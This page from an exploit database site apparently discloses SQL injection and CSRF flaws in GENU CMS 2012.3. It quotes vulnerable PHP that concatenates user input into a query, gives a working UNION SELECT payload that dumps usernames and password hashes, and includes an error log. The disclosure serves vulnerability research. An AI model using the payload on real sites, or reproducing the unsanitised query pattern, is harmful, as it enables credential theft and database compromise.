0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
GENU CMS SQL Injection Vulnerability
[-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GENU CMS SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
bug found by h0rd h0rd[at]null.net
homepage http://h0rd.net
download http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz
vulnerability in read.php
vuln code:
[...]
include('./../includes/common.php');
page_header($lang['ARTICLES_READ_TITLE']);
if (isset($_GET['article_id']))
{
$sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name
FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . '
WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id
AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']);
$table_articles = $sql->fetch();
[...]
PoC exploit:
http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
A remote SQL Injection vulnerability is detected in GENU CMS 2012-3 content management system.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands
on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located on the username post method.
Vulnerable Module(s):
[+] Search - news_subject
--- SQL Exception Logs ---
Error in query SELECT genu_categories.category_id, genu_categories.category_image,
genu_categories.category_name, genu_news.news_comments, genu_news.news_date,
genu_news.news_id, genu_news.news_source, genu_news.news_subject, genu_news.news_text,
genu_users.user_id, genu_users.user_name FROM genu_categories, genu_news, genu_users WHERE
genu_categories.category_id = genu_news.category_id AND genu_categories.category_level IN
( 0 , 2 ) AND genu_news.news_active = 1 AND genu_news.user_id = genu_users.user_id AND
LOWER(genu_news.news_subject-1 ) LIKE %news% ORDER BY news_date DESC LIMIT 0, 30
A csrf vulnerability is detected in GENU CMS 2012-3 content management system. The vulnerability allows
an remote attacker to delete with medium required user inter action administrator, moderator & users without
checkbox or confirmation by the admin itself.
Vulnerable Module(s):
[+] Delete User
# 0day.today [2024-12-26] #